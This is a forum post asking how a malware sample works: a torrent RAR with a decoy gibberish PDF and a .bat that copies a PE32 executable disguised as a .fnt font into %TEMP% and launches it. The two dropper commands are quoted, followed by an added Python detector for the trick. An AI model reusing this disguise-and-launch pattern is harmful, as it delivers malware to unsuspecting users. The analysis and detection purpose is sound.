Razz Posted December 13, 2016

Hi guys, I'm learning about malware and I remember stumbling upon this cool forum some time ago. I recently downloaded a PDF of a book, because I wanted to look up some pages in the book since it was used as a source in an article I was reading. It's a pretty obscure book and since I couldn't find a legitimate source for it, I thought what the hell, why not try one of the risky fake-looking torrent links. To my surprise the torrent downloaded immediately and I got a .rar file. Normally with these things the rar file is either encrypted with a password or the PDF itself is fake and only contains instructions on how to complete a CPA offer to get access to the (most of the time non-existent) PDF file. But to my surprise the rar file contained this:

add.AcrobatPDFsomefont.bat
ADOBE_somefont.fnt
title.pdf
IMPORTANT.NOTICE.txt

I changed the font name to make it harder for the malware maker to stumble upon this topic using Google; I'm pretty sure that wasn't needed.

Content of IMPORTANT.NOTICE.txt: "IMPORTANT NOTICE: Install the necessary fonts using add.AcrobatPDFsomefont.bat file."

The PDF file is 300+ pages long and is filled with gibberish. At the top it says in red letters a similar warning: "ADOBE PDF Warning: required fonts is not installed. (ADOBE_somefont.fnt)"

Pretty cool, apparently they want me to click on the .bat file; this is probably malware. The .bat file has two commands:

copy ADOBE_somefont.fnt %TEMP%
acrobat /convert fonts:UTF-8 /font:load & start %TEMP%\ADOBE_somefont.fnt

Since it was late and my curiosity got the better of me after viewing the .bat file, I decided to run it (I know). The bat file started a command line screen with hardcoded text telling me the supposed font had been loaded. Now I'm really interested in how this works. Analyzing the .fnt file tells me it is a PE32 executable. Looking around with PE Explorer I can see the contents of the malware, but I'm not skilled enough to actually understand what it is trying to do.

My question is, how does malware like this work? How can that "acrobat" command execute a .fnt file and why didn't my antivirus pick up on this? Using VirusTotal, 4-5 out of 50 virus scanners say it uses some kind of malign heuristics to do its work, but maybe that's just because it was packed.

I'm not sure if I have earned the privilege yet to upload files, and even so I'm pretty sure uploading files will raise suspicion since I have just registered as a new user. But I can upload the rar file if anyone is interested in taking a look at it. Thanks in advance!
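Added example (not from the post or any tool it names): a small Python checker for the two things the post describes. It identifies a PE file from its MZ/PE headers rather than trusting the .fnt extension (and tells PE32 from PE32+), and it flags the .bat staging pattern: copy the payload into %TEMP%, then use '&' so that start runs whether or not the decoy "acrobat" command exists. The PE bytes and the .bat text are constructed test inputs.

```python
import os
import re
import struct

# Constructed sample: the two-line .bat from the post, reproduced here as test input.
SAMPLE_BAT = (
    "copy ADOBE_somefont.fnt %TEMP%\n"
    "acrobat /convert fonts:UTF-8 /font:load & start %TEMP%\\ADOBE_somefont.fnt\n"
)
FONT_EXTENSIONS = {".fnt", ".fon", ".ttf", ".otf"}

def detect_pe(data: bytes):
    """Return 'PE32', 'PE32+' or None based on the MZ/PE headers, ignoring the extension."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of the "PE\0\0" signature
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]  # optional-header Magic field
    return {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)

def classify(filename: str, data: bytes) -> str:
    """Flag a PE whose extension claims it is a font (the .fnt trick from the post)."""
    kind = detect_pe(data)
    ext = os.path.splitext(filename)[1].lower()
    if kind and ext in FONT_EXTENSIONS:
        return f"suspicious: {kind} executable with font extension {ext}"
    return kind or "not a PE file"

def dropper_indicators(bat_text: str):
    """List dropper traits in a .bat: staging into %TEMP%, '&' chaining a decoy command
    with 'start' (cmd runs the right-hand side even if the left one fails), and the
    started file carrying a font extension."""
    found = []
    if re.search(r"(?im)^\s*copy\s+\S+\s+%TEMP%", bat_text):
        found.append("copies payload into %TEMP%")
    m = re.search(r"(?i)&\s*start\s+(%TEMP%\\\S+)", bat_text)
    if m:
        found.append("'&' chains a decoy command with start")
        if os.path.splitext(m.group(1))[1].lower() in FONT_EXTENSIONS:
            found.append("starts a font-named file from %TEMP%")
    return found

def build_sample_pe(magic: int = 0x10B) -> bytes:
    """Constructed minimal PE-shaped bytes (not a runnable program) to exercise detect_pe."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE header right after DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    return bytes(dos) + coff + struct.pack("<H", magic) + bytes(0xE0 - 2)

if __name__ == "__main__":
    print(classify("ADOBE_somefont.fnt", build_sample_pe()))
    print(dropper_indicators(SAMPLE_BAT))
```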